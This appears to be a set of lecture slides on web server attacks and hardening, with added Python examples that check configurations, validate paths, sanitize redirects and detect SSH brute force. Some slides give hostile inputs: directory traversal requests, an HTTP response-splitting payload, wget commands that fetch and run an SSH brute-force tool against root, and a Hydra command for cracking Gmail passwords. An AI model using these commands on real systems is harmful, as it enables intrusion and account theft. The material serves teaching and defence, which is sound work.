2. The Story
Once upon a time, there lived a lady, Pinky, who owned a website and had hired a
Security Consultant to protect it from malicious attackers.
One fine day, around 2:00 AM, she wanted to check her website and found that it had
been HACKED. She immediately called her security guy and told him the website had
been hacked.
The poor chap, who had been leisurely enjoying his dinner, was startled at 2:00 AM. He
jumped out of bed into his chair and verified that the website was intact, with no harm done.
He conveyed this to Pinky, but even after all the cleaning work, like clearing browser
cookies, deleting temp files and everything else, Pinky was still getting the hacked
website. On the other hand, the Security Consultant was sure that the website had not
been hacked.
The story ends here :)
3. Moral of The Story
The story in the previous slide suffers from an attack known as a Local DNS Cache
Poisoning Attack.
The attacker has poisoned the lady's local DNS server, and hence every time she
requests the IP address of her website, she gets the fake IP address of the
hacked page.
On the other hand, the Security Consultant was not attacked, and hence he was able to
see the real website.
For more, please follow the discussion on slide no : 22
4. Agenda of the day ... ?
News
Terminology
Attacks
How to secure a web server ?
What to do Next ?
10. Web... ?
A complex system of interconnected elements.
Security... ?
The state of being free from danger or threat.
Web Security... ?
Web Security, also known as “Cyber security”, involves protecting
information by preventing, detecting, and responding to attacks.
11. Server... ?
A server is simply a computer program (software or hardware) that dispenses web
responses as they are requested.
Types of Server... ?
Server Platform
Application Server
Audio/Video Server
Chat Server
Fax Server
Groupware Server
IRC Server
FTP Server
News Server
Proxy Server
Telnet Server
Virtual Servers
Web Server
List Server
Mail Server
Directory Server
15. Impact of Web-Server Attacks... ?
Compromise of User Accounts
Data Tampering
Website Defacement
Secondary Attacks from the compromised website
Data Theft
Root Access to other Applications and Programs
17. Server Misconfiguration Attack...
The following default or incorrect configuration in the httpd.conf file on an
Apache server does not restrict access to the server-status page:
Example :
<Location /server-status>
SetHandler server-status
</Location>
This configuration allows the server status page to be viewed by any client.
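As an added example (not part of the slides), a Python check that scans httpd.conf text for server-status locations that carry no access directive. The two configuration fragments are constructed, the hardened one using an Apache 2.4 Require ip rule, and treating any Require/Allow/Deny/AuthType line as a restriction is a deliberate simplification.

```python
import re

# Constructed httpd.conf fragments for this example (not from a real server):
# the first is the unrestricted default shown on the slide, the second limits
# the page to loopback and an internal range.
WEAK_CONF = """
<Location /server-status>
SetHandler server-status
</Location>
"""
HARDENED_CONF = """
<Location /server-status>
    SetHandler server-status
    Require ip 127.0.0.1 10.0.0.0/8
</Location>
"""

LOCATION_RE = re.compile(
    r"<Location\s+(?P<path>\S+)\s*>(?P<body>.*?)</Location>",
    re.IGNORECASE | re.DOTALL,
)
# Directives that limit who may reach a location (Apache 2.4 and 2.2 forms).
ACCESS_DIRECTIVES = ("Require ", "Allow from", "Deny from", "AuthType ")


def find_unrestricted_status_pages(conf_text):
    """Return the <Location> paths that expose server-status with no access rule.

    Only directives inside the block are inspected; a rule inherited from
    elsewhere in the configuration would not be seen by this check.
    """
    findings = []
    for m in LOCATION_RE.finditer(conf_text):
        body = m.group("body")
        if not re.search(r"^\s*SetHandler\s+server-status\b", body,
                         re.IGNORECASE | re.MULTILINE):
            continue
        restricted = any(
            re.search(r"^\s*" + re.escape(d), body, re.IGNORECASE | re.MULTILINE)
            for d in ACCESS_DIRECTIVES
        )
        if not restricted:
            findings.append(m.group("path"))
    return findings


if __name__ == "__main__":
    print(find_unrestricted_status_pages(WEAK_CONF))      # ['/server-status']
    print(find_unrestricted_status_pages(HARDENED_CONF))  # []
```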
18. Directory Traversal Attack... ?
Directory traversal is an HTTP exploit which allows attackers to access restricted
directories and execute commands outside of the web server's root directory.
Web servers provide two main levels of security mechanisms:
Access Control Lists (ACLs)
Root directory
Example :
A normal request:
GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
Traversal requests:
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c: HTTP/1.1
Host: server.com
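An added example of the server-side check that defeats the requests above (not code from the slides): the requested view is decoded, normalised and only served if it still lies under the document root. The root path is constructed, and the sample values are the slide's own view parameters.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for this example; a real server would use its own.
WEB_ROOT = "/var/www/html"


def resolve_within_root(requested, web_root=WEB_ROOT):
    """Map a client-supplied path to a file under web_root, or return None.

    The value is percent-decoded (twice, to catch double encoding such as
    %252e%252e) before normalisation, so an encoded separator like %5c cannot
    slip past the check, and backslashes are treated as separators because
    Windows servers accept them.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None  # a NUL byte would truncate the path in a C-based server
    decoded = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(web_root, decoded))
    # Accept the root itself or anything strictly beneath it; normpath has
    # already folded every ../ so an escape shows up as a path outside the root.
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # The first value is the slide's legitimate request, the others its traversals.
    for view in ("oldarchive.html",
                 "../../../../../Windows/system.ini",
                 "..%5c../Windows/System32/cmd.exe"):
        print(repr(view), "->", resolve_within_root(view))
```

On a live filesystem, also pass the result through os.path.realpath and repeat the prefix check, so a symlink under the root cannot point outside it.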
19. Man-In-The-Middle Attack... ?
A man-in-the-middle attack is one in which the attacker secretly intercepts and relays
messages between two parties who believe they are communicating directly with each
other.
20. HTTP Response Splitting Attack... ?
In the HTTP Response Splitting attack, there are always (at least) 3 parties involved:
Web server - which has a security hole enabling HTTP Response Splitting
Target - an entity that interacts with the web server on behalf of the attacker
Attacker - initiates the attack
Header splitting is an attack designed to steal data from users of a site. It can be used
to execute cross-site scripting attacks, steal user data, or deface sites such that they
appear to contain content the creator did not intend.
Example :
<?php
header ("Location: " . $_GET['page']);
?>
http://icis.digitalparadox.org/~dcrab/redirect.php?page=http://www.digitalparadox.org
21. HTTP Cache Poisoning Attacks... ?
HTTP Cache Poisoning is actually a very straightforward modification of HTTP splitting,
and can be achieved by simply adding a header indicating that the version of the page
being returned was last modified sometime in the future, which will in turn trigger the
browser to cache said page.
In fact, setting the Last-Modified header for the page to the future ensures subsequent
requests for that page will result in a 304 Not Modified response from the server,
until such a time that the cache is outdated.
Example :
foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 28 Sep 2016 14:50:18 GMT
Content-Length: 47

Hacker was here
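One block serves slides 20 and 21, as an added example rather than the deck's own code: a hardened Python counterpart of the PHP redirect that refuses CR/LF and off-site targets, plus a cache-side check that flags a Last-Modified date later than the current time. The allow-listed host, the embedded injected response and the reference dates are constructed.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Constructed allow list for this example: the only host a redirect may target.
ALLOWED_REDIRECT_HOSTS = {"www.digitalparadox.org"}
# Constructed: the slide's injected second response as it would arrive in ?page=
INJECTED_PAGE = ("foobar\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\n"
                 "Content-Type: text/html\r\n"
                 "Last-Modified: Mon, 28 Sep 2016 14:50:18 GMT\r\n"
                 "Content-Length: 47\r\n\r\nHacker was here")


def build_redirect_header(page):
    """Hardened counterpart of header("Location: " . $_GET['page']); None = refuse."""
    if "\r" in page or "\n" in page:
        return None  # CR/LF would end the header and start a second response
    parts = urlsplit(page)
    if parts.scheme or parts.netloc:
        # Absolute URL: only http(s) to an allowed host, so the redirect page
        # cannot be abused as an open redirector either.
        if parts.scheme not in ("http", "https") or parts.netloc not in ALLOWED_REDIRECT_HOSTS:
            return None
    elif not page.startswith("/"):
        return None  # relative targets must be site-absolute paths
    return "Location: " + page


def parse_http_date(value):
    stamp = parsedate_to_datetime(value.strip())
    return stamp if stamp.tzinfo else stamp.replace(tzinfo=timezone.utc)


def last_modified_in_future(raw_response, now_http_date=None):
    """True when the response claims a Last-Modified after 'now': a cache-poisoning tell."""
    now = parse_http_date(now_http_date) if now_http_date else datetime.now(timezone.utc)
    m = re.search(r"^Last-Modified:[ \t]*(.+?)\r?$", raw_response, re.MULTILINE | re.IGNORECASE)
    if not m:
        return False
    try:
        return parse_http_date(m.group(1)) > now
    except (TypeError, ValueError):
        return False


if __name__ == "__main__":
    print(build_redirect_header(INJECTED_PAGE))  # None
    print(last_modified_in_future(INJECTED_PAGE, "Wed, 01 Jan 2014 00:00:00 GMT"))  # True
```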
22. DNS Hijacking ... ?
DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that
overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the
default DNS settings.
A hacker or a malware program gains unauthorized access to your computer and changes the
DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and
maintained by the hacker.
Other dangers of DNS hijacking include the following attacks:
Pharming
Phishing
23. DNS Amplification Attack... ?
A Domain Name System (DNS) amplification attack is a popular form of distributed denial
of service (DDoS) that relies on the use of publicly accessible open DNS servers to
overwhelm a victim system with DNS response traffic.
Impact
A misconfigured Domain Name System (DNS) server can be exploited to participate in a
distributed denial of service (DDoS) attack.
In March 2013, the method was used to target Spamhaus, likely by a purveyor of
malware whose business the organization had disrupted by blacklisting. The
anonymity of the attack was such that Spamhaus is still unsure of the source.
Furthermore, the attack was so severe that it temporarily crippled and almost brought
down the Internet.
25. SSH Brute Force Attack... ?
SSH is an acronym which stands for Secure Shell, which provides secure shell
access to a remote machine.
wget http://zeldor.biz/other/bruteforce/passlist.txt
wget http://zeldor.biz/other/bruteforce/brutessh.zip
python brutessh.py -h 10.1.100.4 -u root -d passlist.txt
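As an added detection example (not from the slides): a small parser over constructed sshd log lines in syslog format that counts failed passwords per source address and flags a burst that was followed by a successful login. The threshold, hostnames and addresses are assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd log lines in syslog format (not a real capture).
AUTH_LOG = """\
Mar  3 02:01:11 web01 sshd[2211]: Failed password for root from 10.1.100.77 port 51022 ssh2
Mar  3 02:01:13 web01 sshd[2213]: Failed password for root from 10.1.100.77 port 51024 ssh2
Mar  3 02:01:14 web01 sshd[2215]: Failed password for invalid user admin from 10.1.100.77 port 51026 ssh2
Mar  3 02:01:16 web01 sshd[2217]: Failed password for root from 10.1.100.77 port 51028 ssh2
Mar  3 02:01:18 web01 sshd[2219]: Failed password for root from 10.1.100.77 port 51030 ssh2
Mar  3 02:01:20 web01 sshd[2221]: Accepted password for root from 10.1.100.77 port 51032 ssh2
Mar  3 02:05:40 web01 sshd[2300]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Mar  3 02:05:50 web01 sshd[2302]: Accepted publickey for alice from 192.0.2.10 port 40003 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")


def find_brute_force_sources(log_text, threshold=5):
    """Return {ip: {...}} for sources with at least `threshold` failed logins.

    A success recorded after such a burst is flagged separately, since that is
    the case that needs an immediate response rather than just a block.
    """
    failures = defaultdict(int)
    users = defaultdict(set)
    success_after = defaultdict(bool)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            users[ip].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(2)] >= threshold:
            success_after[m.group(2)] = True
    return {
        ip: {"failures": n, "users": sorted(users[ip]),
             "succeeded_after": success_after[ip]}
        for ip, n in failures.items() if n >= threshold
    }


if __name__ == "__main__":
    for ip, info in find_brute_force_sources(AUTH_LOG).items():
        print(ip, info)
```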
26. Web-Server Password Cracking Attacks... ?
A hacker can use a variety of password cracking techniques such as brute force,
dictionary attacks and rainbow tables to crack weak administrator account passwords.
Example : THC - Hydra
For Gmail password cracking, the syntax is as below:
hydra -S -l <email> -P <passlist.txt> -e ns -V -s 465 smtp.gmail.com smtp
27. DoS/DDoS Attack... ?
Renders websites and other online resources unavailable to intended users.
DoS threats come in many flavors, with some directly targeting the underlying server
infrastructure. Others exploit vulnerabilities in application and communication protocols.
A successful DoS attack is a highly noticeable event impacting the entire online user
base. This makes it a popular weapon of choice for hacktivists, cyber vandals,
extortionists and anyone else looking to make a point or champion a cause.
A website in France was hammered by a Distributed Denial of Service attack
that hit it at a rate from 325Gbps to 400Gbps, making it the strongest DDoS
attack ever.
28. Phishing Attacks ... ?
Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking
email in an attempt to gather personal and financial information from recipients.
Typically, the messages appear to come from well known and trustworthy Web sites.
Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo,
BestBuy, and America Online.
30. Website Defacement... ?
The term "website defacement" refers to any unauthorized changes made to the
appearance of either a single webpage, or an entire site.
In some cases, a website is completely taken down and replaced by something new.
In other instances, a hacker may inject code in order to add images, popups, or text to a
page that were not previously present.
37. Securing a Web Server.... ?
01. Remove Unnecessary Services
02. Remote access
03. Separate development / testing / production environment
04. Web application content and server-side scripting
05. Permissions and privileges
06. Install all security patches on time
07. Monitor and audit the server
08. User accounts
09. Remove all unused modules and application extensions
10. Use security tools provided with web server software
11. Stay informed
12. Use Scanners
38. What's Cooking Next... ?
Webserver Attack Methodology
Application Security Scanner
Mirroring a Website
Vulnerability Scanning
Tools Demo :
Web Password Cracking Tool : THC-Hydra and Brutus
Web Server Security Scanner : Wikto and Acunetix Web Vulnerability Scanner
Web Server Pen Testing Tool : CORE Impact® Pro
Web Application Security Scanner: Syhunt Dynamic and N-Stalker Web
Enumerating Webserver Information Using Nmap